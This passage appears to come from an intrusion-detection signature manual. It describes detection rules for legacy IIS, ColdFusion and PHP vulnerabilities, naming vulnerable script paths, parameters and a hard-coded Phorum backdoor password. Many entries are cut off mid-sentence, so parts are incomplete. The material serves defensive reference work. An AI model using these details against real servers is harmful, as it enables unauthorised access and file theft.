emails.The 'Users' directory, if not already created, is automatically generated once the first successful upload has been
completed. By default the 'Everyone' group is given NTFS Change privileges in the 'Users' directory. As well, Scripting
and Write permissions are assigned by IIS. Due to all of these factors, it is possible for a user to create and upload
various content including ASP pages to the web server through the Anonymous Internet Account
(IUSR_machinename).Successful exploitation of this vulnerability will allow a remote user to possibly upload
malicious content to the web site.Vulnerable platform is Microsoft Site Server Commerce Edition 2.0
238
Signature ID: 1768
WEB-IIS query.asp access Vulnerability
Hypertext Transfer Protocol server and a File Transfer Protocol server. It was developed by Microsoft. Microsoft
IIS(Microsoft IIS version 4.0) that include the "ExAir" sample site pages are vulnerable to a denial of service attack. If
certain ExAir.asp(active server page) pages are requested directly without having the sample site dlls running,will
cause the server CPU to increases to 100%. By submitting such a request for these .asp pages, and attacker can exhaust
all CPU resources on the server.
Signature ID: 1769
WEB-IIS search97.vts access Vulnerability
Signature Description: The Verity/Search'97 software provides a search engine. Verity Search97 2.1.0 is vulnerabile to
a cross site scripting. This vulnerability is due to cgi-bin scripts, s97_cgi and s97r_cgi failing to check for the existence
of certain shell meta characters.A successful exploitation of this issue will allow an attacker to access any file on the
file system. This rule will triggers when an attempt is made to send a search97.vts pattern. This issue is fixed in latest
versions. Update the patch for this vulnerability, available from the Verity Customer Support site.
Signature ID: 1770
WEB-IIS sgdynamo.exe access Vulnerability
Signature Description: SGDynamo is a web application engine for Microsoft Windows operating systems. SGDynamo
is vulnerable to cross-site scripting. A remote attacker could crate a malicious URL link containing sgdynamo.exe
javascript embedded within the HTNAME parameter, once the link is clicked. An attacker could use this vulnerability
to steal a user's cookies and execute arbitrary code on the system. Upgrade to the version 5.32T and later(5.32U, 6.1,
7.00), available at vendor's website.
Signature ID: 1772
Microsoft Internet Information Services iissamples directory access Vulnerability
Nessus: 10370
Signature Description: This rule gets hit when an attempt is made to access iissamples directory on a host running
Microsoft Internet Information Server (IIS). Some applications may store sensitive information such as database
connections, user information, passwords and customer information in files accessible via a web interface. Care should
be taken to ensure these files are not accessible to external sources. The attacker may be trying to gain information on
the IIS implementation on the host, this may be the prelude to an attack against that host using that information.
Signature ID: 1773
Srch.htm file access on Microsoft Internet Information Server Vulnerability
when an attempt is made to access a sample application 'search functionality' on Microsoft IIS server. This application
may present an attacker with the opportunity to gain valuable information regarding the implementation of IIS on the
affected host.
239
Signature ID: 1774
Microsoft Index Server 'srchadm' file access Vulnerability
Nessus: 11032
Signature Description: The Microsoft Indexing Server comes as part of Windows 2000, Windows XP and Windows
2003 and does not require any additional licensing. Indexing Server is provides search capabilities. This rule will
triggers when an attempt is made to access srchadm, a directory used by the Microsoft Index Server in IIS. The attacker
may be trying to gain information on the IIS implementation on the host, this may be the prelude to an attack against
that host using that information.
Signature ID: 1775
Microsoft Site Server 2.0 with IIS 4.0 uploadn.asp file access Vulnerability
Signature Description: Microsoft Site Server is an intranet server designed for an NT Server with IIS. Site Server
enables users to locate and view information stored in various locations through personalized web pages and emails.
The 'Users' directory, if not already created, is automatically generated once the first successful upload has been
completed. By default the 'Everyone' group is given NTFS Change privileges in the 'Users' directory. As well, Scripting
and Write permissions are assigned by IIS. Due to all of these factors, it is possible for a user to create and upload
various content including ASP pages to the web server through the Anonymous Internet Account
(IUSR_machinename).Successful exploitation of this vulnerability will allow a remote user to possibly upload
malicious content to the web site. Microsoft Site Server Commerce Edition 2.0 is vulnerable.
Signature ID: 1776
Microsoft Internet Information Server 'users.xml' file access Vulnerability
Hypertext Transfer Protocol server and a File Transfer Protocol server. It was developed by Microsoft. This rule gets
hit when an attempt is made to exploit a potential weakness on a host running Microsoft Internet Information Server
(IIS). Specifically, this event indicates an attempt to retrieve the file "users.xml" which may contain username and
password information for the host.
Signature ID: 1777
Microsoft Windows 2000 Resource Kit W3Who.DLL Buffer Overflow Vulnerability
Signature Description: The Microsoft Windows 2000 Resource Kit supports many utilities designed for diagnostic
administration of the Windows platform. W3Who is an Internet server application Dynamic-Link library (DLL)
designed to display information regarding the calling context of the client browser along with the configuration of the
host server. W3Who is vulnerable to a buffer overflow. A remote attacker could send a specially-crafted string
containing 519 to 12571 characters to overflow a buffer and execute arbitrary code on the system.
Signature ID: 1779
RSA Authentication Agent for Microsoft IIS Heap Overflow Vulnerability
Signature Description: RSA Authentication Agent software provides access control for networks, web applications,
and operating systems. It is used in conjunction with RSA SecurID Authenticators and Authentication Manager
240
software. RSA Authentication Agent for Web for IIS contains a heap overflow vulnerability. When a Web client sends
a Hyper Text Transfer Protocol (HTTP) request to an IIS Web server, IIS parses the Uniform Resource Locator (URL),
and passes it to SecurID. SecurID then authenticates the remote user. If the user passes authentication, SecurID grants
permission to access the server. The vulnerability exists in SecurID when it parses the URL request received from the
IIS. The flaw can be triggered by a specially crafted HTTP request containing data encoded using the "chunked"
transfer encoding. Successful exploitation of this vulnerability could allow a remote, unauthenticated attacker to
execute arbitrary code with LocalSystem privileges on the vulnerable server. Vulnerable Platforms are RSA
Authentication Agent for Web 5.0, 5.2, 5.3
Signature ID: 1800
WEB-COLDFUSION CFUSION_VERIFYMAIL access Vulnerability
Signature Description: ColdFusion is a programming language based on standard HTML(Hyper Text Markup
Language) that is used to creating and serving web-based applications that interact with back-end databases. Web pages
that interact with ColdFusion application servers have a .cfm file extension. ColdFusion Web pages include tags written
in Cold Fusion Markup Language(CFML). ColdFusion(ColdFusion versions 3.x and 4.x) server include undocumented
CFML(ColdFusion Markup Language) tags and functions that are used in the ColdFusion Administrator. The
undocumented CFUSION_VERIFYMAIL() function, could be used by an attacker to Verifies the connection to the
default ColdFusion SMTP mail server.
Signature ID: 1801
WEB-COLDFUSION addcontent.cfm access Vulnerability
development of computer software in general, and dynamic web sites. ColdFusion is a similar product to Microsoft
ASP.NET, JavaServer Pages or PHP. ColdFusion Server includes several undocumented CFML tags and functions.
ColdFusion 4.x is vulnerable. Undocumented CFML tags in ColdFusion will allow an remote attacker to gain
unauthorized access to administrative privileges, including registry and advanced security settings. This rule will
triggers when an attempt is made to send cfdocs/exampleapp/publish/admin/addcontent.cfm pattern. Update the latest
version to resolve this issue.
Signature ID: 1802
WEB-COLDFUSION admin decrypt Vulnerability
cfusion_decrypt() function, this can be used to retrieve and decrypt the admin and studio passwords. With these
passwords, an attacker can use a variety of tools for retrieve directory listing, uploadfiles, registry access, and security
access.
Signature ID: 1803
WEB-COLDFUSION admin encrypt Vulnerability
241
cfusion_encrypt() function, this can be used to retrieve and decrypt the admin and studio passwords. With these
passwords, an attacker can use a variety of tools for retrieve directory listing, uploadfiles, registry access, and security
access.
Signature ID: 1804
Allaire ColdFusion Path Disclosure Vulnerability
Signature Description: Allaire ColdFusion is a popular web applications development tool. ColdFusion uses a tagbased, server scripting language that is ideal for programming web applications. The ColdFusion Markup
Language(CFML) cleanly integrates with HTML(Hyper Text Markup Language) for user interface and XML for data
exchange. ColdFusion Server(ColdFusion versions 4.0, 4.0.1, and 4.5.0) allow remote attacker to determine the real
pathname of the server via an HTTP request to the application.cfm. Upgrade the latest version of Allaire ColdFusion,
Signature ID: 1805
WEB-COLDFUSION beaninfo access Vulnerability
ColdFusion( 2.0, 3.0, 3.0.1, 3.1, 3.1.1, 3.1.2, 4.0, 4.0.1) are vulnerable. Undocumented CFML tags in ColdFusion will
allow an remote attacker to gain unauthorized access to administrative privileges, including registry and advanced
security settings. This rule will triggers when an attempt is made to send cfdocs/examples/cvbeans/beaninfo.cfm
pattern. Upgrade the patches are available from vendors web site.
Signature ID: 1806
WEB-COLDFUSION cfappman access Vulnerability
security settings. This rule will triggers when an attempt is made to send cfappman/index.cfm pattern. Upgrade the
patches are available from vendors web site.
Signature ID: 1807
Allaire ColdFusion 4.0x CFCACHE Vulnerability
Signature Description: Allaire ColdFusion is a popular web applications development tool. ColdFusion uses a tag242
based, server scripting language that is ideal for programming web applications. The ColdFusion Markup
exchange. ColdFusion(ColdFusion version 4.0, and 4.0.1) uses a CFCACHE tag. When the CFCACHE tag is used in
CFM page, it creates temprory files and also creates a cfcache.map files(which contains pointers to the .tmpfiles
including absolute pathnames, timestamps, and other URL information) with in the web document root, allowing
remote attacker to obtain sensitive system information. Upgrade to the latest version of ColdFusion(4.5 or later),
Signature ID: 1808
WEB-COLDFUSION datasource Vulnerability
undocumented CFUSION_ISCOLDFUSIONDATASOURCE() function, could be used by an attacker to Verifies a
connection to a ColdFusion data source.
Signature ID: 1809
WEB-COLDFUSION datasource password Vulnerability
undocumented CFUSION_SETDATASOURCEPASSWORD() function, could be used by an attacker to Sets the
default password for the ColdFusion data source.
Signature ID: 1810
WEB-COLDFUSION datasource username vulnerability
undocumented CFUSION_SETDATASOURCEUSERNAME() function, could be used by an attacker to Sets the
default user name for a ColdFusion data source.
Signature ID: 1811
WEB-COLDFUSION db connections flush vulnerability
243
undocumented CFUSION_DBCONNECTIONS_FLUSH() function, could be used by an attacker to disconnects all
curretly connected ColdFusion datasources.
Signature ID: 1812
WEB-COLDFUSION displayfile access Vulnerability
security settings. This rule will triggers when an attempt is made to send cfdocs/expeval/displayopenedfile.cfm pattern.
Upgrade the patches are available from vendors web site.
Signature ID: 1813
WEB-COLDFUSION evaluate.cfm access Vulnerability
security settings. This rule will triggers when an attempt is made to send cfdocs/snippets/evaluate.cfm pattern. Upgrade
the patches are available from vendors web site.
Signature ID: 1814
WEB-COLDFUSION exampleapp access Vulnerability
ColdFusion 4.5 is vulnerable. Undocumented CFML tags in ColdFusion will allow an remote attacker to gain
triggers when an attempt is made to send cfdocs/exampleapp/email/application.cfm pattern. This issue is fixed in
Allaire ColdFusion Server 5.0. Administrators are advised to update the 5.0 or later version to resolve this issue.
Signature ID: 1815
WEB-COLDFUSION exampleapp application.cfm Vulnerability
244
ColdFusion( 4.5,4.0.1,4.0) are vulnerable to path disclosure. Undocumented CFML tags in ColdFusion will allow an
remote attacker to gain unauthorized access to administrative privileges, including registry and advanced security
settings. This rule will triggers when an attempt is made to send cfdocs/exampleapp/email/application.cfm pattern. This
issue is fixed in Allaire ColdFusion Server 4.5.1. Administrators are advised to update the 4.5.1 version to resolve this
issue.
Signature ID: 1816
WEB-COLDFUSION expeval access Vulnerability
ColdFusion( 2.0, 3.0, 3.0.1, 3.1, 3.1.1, 3.1.2, 4.0) are vulnerable. Undocumented CFML tags in ColdFusion will allow
an remote attacker to gain unauthorized access to administrative privileges, including registry and advanced security
settings. This rule will triggers when an attempt is made to send cfdocs/expeval/ pattern. This issue is fixed in
ColdFusion 4.0.1 version. Administrators are advised to update the 4.0.1 version to resolve this issue.
Signature ID: 1817
Allaire Forums Getfile Vulnerability
Signature Description: Allaire Forums is a flexible conferencing system that enables on-line discussions via the Web
on Intranets and the Internet. With Forums we can create web-conferences where people communicate and share
information using a Web browser. The "GetFile.cfm" in Allaire Forums allows anyone to access any file on the Forums
server. This vulnerability affects Forums version 2.0.4 and earlier. Upgrade the latest version of Allaire Forums,
Signature ID: 1818
WEB-COLDFUSION getodbcdsn access Vulnerability
undocumented CFUSION_GETODBCDSN() function, could be used by an attacker to gets ODBC data source names
from the registry.
Signature ID: 1819
WEB-COLDFUSION getodbcin Vulnerability
245
undocumented CFUSION_GETODBCINI() function, could be used by an attacker to gets ODBC data source
information from the registry.
Signature ID: 1820
WEB-COLDFUSION gettempdirectory.cfm access Vulnerability
security settings. This rule will triggers when an attempt is made to send cfdocs/snippets/gettempdirectory.cfm pattern.
Signature ID: 1821
WEB-COLDFUSION mainframeset access Vulnerability
security settings. This rule will triggers when an attempt is made to send cfdocs/examples/mainframeset.cfm pattern.
Signature ID: 1822
WEB-COLDFUSION onrequestend.cfm access Vulnerability
Signature Description: Allaire ColdFusion is a popular web applications development tool. ColdFusion uses a tagbased, server scripting language that is ideal for programming web applications. The ColdFusion Markup
exchange. ColdFusion Server(ColdFusion versions 4.0, 4.0.1, and 4.5.0) allow remote attacker to determine the real
pathname of the server via an HTTP request to the onrequestend files. Upgrade the latest version of Allaire ColdFusion,
Signature ID: 1823
WEB-COLDFUSION parks access Vulnerability
security settings. This rule will triggers when an attempt is made to send cfdocs/examples/parks/detail.cfm pattern.
246
Signature ID: 1824
WEB-COLDFUSION sendmail.cfm access Vulnerability
ColdFusion 4.0 is vulnerable. Undocumented CFML tags in ColdFusion will allow an remote attacker to gain
triggers when an attempt is made to send sendmail.cfm pattern. Upgrade the patches are available from vendors web
site.
Signature ID: 1825
WEB-COLDFUSION setodbcini Vulnerability
undocumented CFUSION_SETODBCINI() function, could be used by an attacker to sets ODBC data source
information in the registry.
Signature ID: 1826
WEB-COLDFUSION settings refresh vulnerability
undocumented CFUSION_SETTINGS_REFRESH() function, could be used by an attacker to Refreshes some
ColdFusion settings not requiring a restart.
Signature ID: 1827
WEB-COLDFUSION snippets vulnerability
security settings. This rule will triggers when an attempt is made to send cfdocs/snippets pattern. Upgrade the patches
are available from vendors web site.
247
Signature ID: 1828
WEB-JBrowser PHP /_admin access vulnerability
Signature Description: JBrowser is a French program that allows a user to create miniature gallery images for
Microsoft Windows operating systems. JBrowser versions 2.4 and earlier are vulnerable Unauthorized access. Due to a
lack of access validation to the '_admin' directory, malevolent users may be able to execute arbitrary admin scripts.
This may allow a malicious user to upload arbitrary files to the affected system and gain access to files outside of the
web server root directory.
Signature ID: 1829
WEB-PHP Advanced Poll admin_comment.php access Vulnerability
Signature Description: Advanced poll is a freely available, open source PHP web application. It is available for the
Unix, Linux, and Microsoft operating systems. Advanced Poll version 2.0.2 could allow a remote attacker to include
malicious PHP files. By sending a specially-crafted URL request to the admin_comment.php script using 'base_path' or
'pollvars[lang]' variables, which would allows remote attacker to read arbitrary files or inject arbitrary local PHP files.
No remedy available as of August, 2008.
Signature ID: 1830
WEB-PHP Advanced Poll admin_edit.php access Vulnerability
malicious PHP files. By sending a specially-crafted URL request to the admin_edit.php script using 'base_path' or
Signature ID: 1831
WEB-PHP Advanced Poll admin_embed.php access Vulnerability
malicious PHP files. By sending a specially-crafted URL request to the admin_embed.php script using 'base_path' or
Signature ID: 1832
WEB-PHP Advanced Poll admin_help.php access Vulnerability
malicious PHP files. By sending a specially-crafted URL request to the admin_help.php script using 'base_path' or
248
Signature ID: 1833
WEB-PHP Advanced Poll admin_license.php access Vulnerability
malicious PHP files. By sending a specially-crafted URL request to the admin_license.php script using 'base_path' or
Signature ID: 1834
WEB-PHP Advanced Poll admin_logout.php access Vulnerability
malicious PHP files. By sending a specially-crafted URL request to the admin_logout.php script using 'base_path' or
Signature ID: 1835
WEB-PHP Advanced Poll admin_password.php access Vulnerability
malicious PHP files. By sending a specially-crafted URL request to the admin_password.php script using 'base_path' or
Signature ID: 1836
WEB-PHP Advanced Poll admin_preview.php access Vulnerability
malicious PHP files. By sending a specially-crafted URL request to the admin_preview.php script using 'base_path' or
Signature ID: 1837
WEB-PHP Advanced Poll admin_settings.php access Vulnerability
249
malicious PHP files. By sending a specially-crafted URL request to the admin_settings.php script using 'base_path' or
Signature ID: 1838
WEB-PHP Advanced Poll admin_stats.php access Vulnerability
malicious PHP files. By sending a specially-crafted URL request to the admin_stats.php script using 'base_path' or
Signature ID: 1839
WEB-PHP Advanced Poll admin_templates.php access Vulnerability
malicious PHP files. By sending a specially-crafted URL request to the admin_templates.php script using 'base_path' or
Signature ID: 1840
WEB-PHP Advanced Poll admin_templates_misc.php access Vulnerability
malicious PHP files. By sending a specially-crafted URL request to the admin_templates_misc.php script using
'base_path' or 'pollvars[lang]' variables, which would allows remote attacker to read arbitrary files or inject arbitrary
local PHP files. No remedy available as of August, 2008.
Signature ID: 1841
WEB-PHP Advanced Poll admin_tpl_misc_new.php access Vulnerability
malicious PHP files. By sending a specially-crafted URL request to the admin_tpl_misc_new.php script using
'base_path' or 'pollvars[lang]' variables, which would allows remote attacker to read arbitrary files or inject arbitrary
local PHP files. No remedy available as of August, 2008.
Signature ID: 1842
WEB-PHP Advanced Poll admin_tpl_new.php access Vulnerability
250
malicious PHP files. By sending a specially-crafted URL request to the admin_tpl_new.php script using 'base_path' or
Signature ID: 1846
WEB-PHP Blahz-DNS dostuff.php access Vulnerability
Signature Description: Blahz-DNS is PHP/MySQL based DNS administration with support for primary and secondary
zones, user authentication, User and Admin account types, and restricted access for user accounts to certain primary
and secondary zones. It is available for Linux systems. Blahz-DNS (Blahz-DNS version 0.2 and prior) contains a flaw
that may allow a malicious user to bypass authentication and modify DNS entries. A remote attacker can access PHP
scripts directly such as dostuff.php, instead of going through the login screen, to gain administrator access to the BlahzDNS system. Upgrade to the latest version of Blahz-DNS, available at Vendor's website.
Signature ID: 1847
WEB-PHP Blahz-DNS dostuff.php modify user authentication Vulnerability
Signature Description: Blahz-DNS is PHP/MySQL based DNS administration with support for primary and secondary
zones, user authentication, User and Admin account types, and restricted access for user accounts to certain primary
and secondary zones. It is available for Linux systems. Blahz-DNS (Blahz-DNS version 0.2 and prior) contains a flaw
that may allow a malicious user to bypass authentication and modify DNS entries. A remote attacker can access PHP
scripts directly such as dostuff.php, instead of going through the login screen, to gain administrator access and modify
the user accounts to the Blahz-DNS system. Upgrade to the latest version of Blahz-DNS, available at Vendor's website.
Signature ID: 1848
WEB-PHP Cyboards default_header.php access Vulnerability
Signature Description: CyBoards PHP Lite is a lightweight PHP/MySQL messageboard system with a threaded style.
CyBoards provides E-Commerce consulting, Shopping Carts, and Web Design Services for Businesses looking to
establish internet Storefronts. CyBoards PHP Lite 1.21 version could allow a remote attacker to include arbitrary files.
By sending a specially-crafted URL request to the default_header.php script using the script_path parameter to specify
a malicious file from a remote system, which could allow the attacker to execute arbitrary code with the privileges of
the target server. Upgrade the latest version of CyBoards PHP Lite, available at vendor's website.
Signature ID: 1849
WEB-PHP Cyboards options_form.php access Vulnerability
Signature Description: CyBoards PHP Lite is a lightweight PHP/MySQL messageboard system with a threaded style.
CyBoards provides E-Commerce consulting, Shopping Carts, and Web Design Services for Businesses looking to
establish internet Storefronts. CyBoards PHP Lite 1.21 version could allow a remote attacker to include arbitrary files.
By sending a specially-crafted URL request to the 'options_form.php' script using the script_path parameter to specify a
malicious file from a remote system, which could allow the attacker to execute arbitrary code with the privileges of the
target server. Upgrade the latest version of CyBoards PHP Lite, available at vendor's website.
251
Signature ID: 1850
WEB-PHP DCP-Portal remote file include editor script vulnerability
Signature Description: DCP-Portal is a content management system that enables various web based updates. It enables
an administrator to remotely manage the entire site, and allow members to submit news or content and reviews etc.
DCP-Portal(DCP-Portal version 6.0) could allow remote attackers to include arbitrary files. A remote attacker could
send a specially-crafted URL to the library/editor/editor.php script using the root parameter. An attacker could use this
vulnerability to execute arbitrary PHP code in the vulnerable web server. No remedy available as of September, 2008.
Signature ID: 1852
WEB-PHP DNSTools administrator authentication bypass Vulnerability
Signature Description: DNSTools is a web based management tool for DNS information. It is implemented in PHP,
and available for Liunx and solaris. DNSTools(DNSTools version 2.0b2 and prior) could allow a remote attacker to
bypass authentication and modify DNS entries. A remote attacker could send a specially-crafted URL request to the
dnstools.php script containing manipulated values for the user_dnstools_administrator to gain administrator access to
DNSTools. Upgrade to the latest version of DNSTools(2.0 beta 5 or later), available at vendor's website.
Signature ID: 1853
WEB-PHP DNSTools authentication bypass Vulnerability
Signature Description: DNSTools is a web based management tool for DNS information. It is implemented in PHP,
and available for Liunx and solaris. DNSTools(DNSTools version 2.0b2 and prior) could allow a remote attacker to
bypass authentication and modify DNS entries. A remote attacker could send a specially-crafted URL request to the
dnstools.php script containing manipulated values for the user_logged_in to gain administrator access to DNSTools.
Upgrade to the latest version of DNSTools(2.0 beta 5 or later), available at vendor's website.
Signature ID: 1854
WEB-PHP MediaWiki DatabaseFunctions.php access Vulnerability
Bugtraq: 9057
Signature Description: A vulnerability has been reported in MediaWiki, which can be exploited by malicious people to
compromise a vulnerable system.The vulnerability is caused due to an input validation error in "UpdateClasses.php",
"Title.php", "Setup.php", "GlobalFunctions.php", and "DatabaseFunctions.php". This can be exploited to execute
arbitrary code on a vulnerable system by supplying a path to a malicious file on a remote system via the "$IP" variable.
Affected versions are MediaWiki-stable 20031107 and MediaWiki-stable 20030829. This signature detects access to
DatabaseFunctions.php.
Signature ID: 1855
WEB-PHP MediaWiki GlobalFunctions.php access Vulnerability
Bugtraq: 9057
252
GlobalFunctions.php.
Signature ID: 1856
WEB-PHP IGeneric Free Shopping Cart page.php access Vulnerability
Bugtraq: 9773
Signature Description: IGeneric Free Shopping Cart is a freely available shopping cart implemented in PHP with a
MySQL backend. IGeneric Free Shopping Cart (iGeneric Free Shopping Cart version 1.4) is vulnerable to cross-site
scripting. A remote attacker could embed malicious script within the type_id variable in a URL request to the page.php
script, which would be executed in the victim's web browser, once the link is clicked. An attacker could use this
vulnerability to steal the victim's cookie-based authentication credentials. No remedy available as of August 2008.
Signature ID: 1857
WEB-PHP IdeaBox cord.php file include Vulnerability
Bugtraq: 7488
Signature Description: PhpOutsourcing IdeaBox is a web-based suggestion box. It is available for a variety of
platforms including Microsoft Windows and Linux and Unix. IdeaBox (PhpOutsourcing IdeaBox versions 1.0,1.1)
could allow a remote attacker to include malicious PHP files. By sending a specially-crafted URL request to the
generformlib_date.php, notification.php, zmail.php, user.php, globalsettings.php, init.php, idea.php, history.php or
cord.php scripts using the $gorumDir or $ideaDir variable to specify a malicious PHP file on a remote system, a remote
attacker can use this vulnerability and execute arbitrary code on the affected server. No remedy available as of August
2008. This signature detects traffic to cord.php.
Signature ID: 1858
WEB-PHP IdeaBox notification.php file include Vulnerability
Bugtraq: 7488
Signature Description: PhpOutsourcing IdeaBox is a web-based suggestion box. It is available for a variety of
platforms including Microsoft Windows and Linux and Unix. IdeaBox (PhpOutsourcing IdeaBox versions 1.0,1.1)
could allow a remote attacker to include malicious PHP files. By sending a specially-crafted URL request to the
generformlib_date.php, notification.php, zmail.php, user.php, globalsettings.php, init.php, idea.php, history.php or
cord.php scripts using the $gorumDir or $ideaDir variable to specify a malicious PHP file on a remote system, a remote
attacker can use this vulnerability and execute arbitrary code on the affected server. No remedy available as of August
2008. This signature detects traffic to notification.php.
Signature ID: 1859
WEB-PHP Invision Board emailer.php file include Vulnerability
Bugtraq: 7204
Signature Description: Invision Board is web forum software. It is implemented in PHP and it is available for Unix and
Linux and Microsoft Windows operating systems. Invision Power Board 1.1.1 version is a vulnerable version. If the
register_globals and allow_url_fopen are enabled, a remote attacker could send a specially-crafted URL request to the
ad_member.php script that specifies a malicious file from a remote system as a parameter, a remote attacker could
execute code on the vulnerable Web server.
253
Signature ID: 1860
WEB-PHP Invision Board ipchat.php file include Vulnerability
Signature Description: Invision Board is web forum software. It is implemented in PHP and it is available for Unix and
Linux and Microsoft Windows operating systems. Invision Board is prone to an issue that may allow remote attackers
to include files located on attacker-controlled servers.This vulnerability is as a result of insufficient sanitization
performed on remote user supplied data used in URI parameters of certain PHP pages.A remote attacker could send a
specially-crafted URL request to the ipchat.php script that specifies the conf_global.php script from a remote system as
a parameter, which would allow the attacker to execute code on the vulnerable Web server. Vulnerable platform is
Invision Board 1.1.1
Signature ID: 1861
WEB-PHP MatrikzGB privilege escalation Vulnerability
Bugtraq: 8430
Signature Description: MatrikzGB Guestbook is a web application that is implemented in PHP. MatrikzGB could
allow a remote attacker to gain unauthorized administrative access to the guestbook, caused by a vulnerability in the
index.php script. A remote attacker with a valid user account can modify the account by sending a specially-crafted
HTTP request with the 'new_rights' parameter to a value of 'admin', allowing the attacker to gain unauthorized
administrative access to the guestbook and obtain other user's passwords in plain text. The affected version is
MatrikzGB 2.0 and prior. No remedy available as of August 2008.
Signature ID: 1862
WEB-PHP Messagerie supp_membre.php access Vulnerability
Bugtraq: 4635
Signature Description: Messagerie is a web message board application maintained by La Basse.An issue has been
discovered in Messagerie, which could allow an attacker to delete arbitrary user accounts.Reportedly, submitting a
specially crafted URL will successfully remove user accounts. Messagerie 1.0 is a vulnerable version.
Signature ID: 1863
WEB-PHP Opt-X header.php remote file include Vulnerability
Signature Description: WEB-PHP Opt-X header.php remote file include attemptOpt-X version 0.7.2 and possibly
earlier versions could allow a remote attacker to include malicious PHP files. A remote attacker could send a speciallycrafted URL request to the header.php script that specifies a malicious file from a remote system as a parameter, which
would allow the attacker to execute code on the vulnerable system. No remedy available as of August, 2008.
Signature ID: 1864
WEB-PHP PHP-Nuke remote file include vulnerability
Signature Description: PHP-Nuke is a web based automated news publishing and content management system based
on PHP and MySQL. The system is fully controlled using a web-based user interface. PHP-Nuke (PHP-Nuke versions
5.3.1 and earlier, and possibly other version below 5.5) could allow remote attackers to execute arbitrary commands on
the Web server, caused by a vulnerability in the index.php script. A remote attacker could send a specially-crafted URL
254
request to the index.php script using the 'file' variable, which would cause arbitrary commands to be executed on the
local shell of the host running the vulnerable Web site with privileges of the Web server process. Upgrade to the latest
version of PHP-Nuke(5.5 or later), available at vendor's website.
Signature ID: 1865
PHP-Wiki Cross-Site Scripting Vulnerability
Signature Description: PHPWiki( PhpWiki version 1.3.3 and prior) contains a flaw that allows a remote cross site
scripting attack. This flaw exists because the application does not validate the pagename variable in the wiki module.
This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within
the trust relationship between the browser and the server, leading to a loss of integrity. No remedy available as of
Spetember, 2008.
Signature ID: 1866
PhpBB viewforum.php and viewtopic.php scripts allow cross-site scripting Vulnerability
Signature Description: PHPBB(PHP Bulletin Board) is the most widely used forum script currently on the web. This is
free and very powerful piece of software. It is easy to install and administer and allow flexibility in terms of design and
organization. PhpBB(PhpBB version 2.0.6d and prior) is a cross-site scripting vulnerability. A remote attacker could
embed malicious code in a specially-crafted URL request to the viewforum.php or viewtopic.php script, once the link is
clicked. An attacker could use this vulnerability to steal the victim's cookie-based authentication credentials.
Signature ID: 1867
PHPLIB remote script execution vulnerability
Signature Description: The PHP Base Library('PHPLIB') is a code library which provides support for session
management in web applications. It is targeted to developers and is widely used in many web applications, so a strong
possibility exists that an application may be using it without the knowledge of the administrator.A problem in
PHPLIB(PHPLIB versions 7.2, 7.2b, 7.2c, and 7.2.1) will allow remote attackers to submit malicious input in web
requests that will cause the application to fetch and then execute scripts from another host.This may allow for attackers
to gain local access to the web server. Upgrade to the latest version of PHPLIB(7.2d-1 tr or later).
Signature ID: 1868
PHPNuke Forum Module Viewtopic.php SQL Injection Vulnerability
Bugtraq: 7193
on PHP and MySQL. The system is fully controlled using a web-based user interface. PHP-Nuke(PHP-Nuke versions
6.0, 6.5 rc2) is a SQL injection vulnerability. An input validation error exists in the 'viewtopic.php' script included with
PHPNuke as part of the Forum module. Because of this, an attacker could send a malicious string through PHPNuke
that would allow the attacker to inject SQL commands and queries into the SQL database used by PHPNuke. No
remedy available as of September, 2008.
255
Signature ID: 1869
PayPal Store Front index.php Remote File Include Vulnerability
Signature Description: PayPal is an online shopping cart system that lets anyone with an email address securely send
and receive online payments using their credit card or bank account. PayPal requires PHP4 and MySQL database on a
Unix or Linux-base operating system. PayPal(PayPal version 3.0) Store Front could allow a remote attacker to include
malicious PHP files, caused by a vulnerability in the index.php script. By sending a specially-crafted URL request to
the index.php script using the 'page' variable, an attacker can use this vulnerability to execute arbitrary code on the
vulnerable web server. No remedy available as of September, 2008.
Signature ID: 1870
WEB-PHP Phorum Multiple Cross-Site Scripting/HTML Injection Vulnerabilities
Signature Description: Phorum is an open source message board system written in PHP. The package is designed to
add enhanced features to a web page, allowing users to interact through bulletin board style chats forums.
Phorum(PHP, Phorum versions 3.4, 3.4.1, and 3.4.5) is a cross-site scripting vulnerability. A remote attacker could
create a malicious URL link containing embedded script to the common.php, profile.php, or login.php scripts, once the
link is clicked. An attacker can use this vulnerability to execute arbitrary code on the vulnerable server.
Signature ID: 1871
WEB-PHP Phorum Arbitrary File Read Vulnerability
Bugtraq: 1997
add enhanced features to a web page, allowing users to interact through bulletin board style chats forums.
Phorum(Phorum version 3.0.x) could allow a remote attacker to traverse directories on the server. By sending a
specially-crafted common.php URL containing "dot dot" sequences(/../) to read files on the web server. An attacker can
use this vulnerability to obtain sensitive information, such as valid accounts. Upgrade the latest version of Phorum,
Signature ID: 1872
WEB-PHP Phorum admin access Vulnerability
Signature Description: Phorum can allow remote users access to restricted files on the local system. This is due to the
handling of passwords by the program. By sending a custom crafted string to the admin.php3 script, it's possible to
change the administrative password of the board without verification of the users credentials. The "default.langname
name" field in the Master settings can then be changed to any file of the users liking, which upon reload, will be output
as the page. This problem makes it possible for a user with malicious motives to take control of the message board,
read any file on the system, and potentially gain remote access. Phorum 3.0.7 is a Vulnerable version. Upgrade the
latest version of Phorum 3.2.11, available at vendor's website.
Signature ID: 1873
WEB-PHP Phorum authentication access Vulnerability
256
Signature Description: Phorum is a freely available, open source, popular WWW Board written by Brian Moon.A
problem with the package allows users access to any resources within the bulletin board system. Any file that is access
controlled by the auth.php3 script may be accessed, due to a backdoor password written into the script auth.php3. The
password "boogieman" will permit users to access files controlled by auth.php3 by simply appending the variable
PHP_AUTH_USER=boogieman to the URL. This makes it possible for users with malicious intentions to access any
file under the access control of auth.php3, and potentially gain elevated privileges, including access to the local system.
Phorum 3.0.7 is a Vulnerable version. Upgrade the latest version of Phorum 3.2.11, available at vendor's website.
Signature ID: 1874
WEB-PHP Phorum code access Vulnerability
add enhanced features to a web page, allowing users to interact through bulletin board style chats forums. code.php3
script of Phorum (Phorum version 3.0.7) can be used to display contents of files located in the directory and contain
sensitive information. A remote attacker can use this vulnerability script to read arbitrary files in the phorum directory
via the query string. Upgrade the latest version of Phorum(3.0.8 or later), available at vendor's website.
Signature ID: 1875
WEB-PHP Phorum read access Vulnerability
add enhanced features to a web page, allowing users to interact through bulletin board style chats forums. Phorum
(Phorum version 3.0.7) is a SQLinjection vulnerability. By sending a specially-crafted SQL statements to the read.php3
script, a remote attacker could use this vulnerability to add, modify, or delete information in the back-end database.
Upgrade the latest version of Phorum(3.2.11 or later), available at vendor's website.
Signature ID: 1876
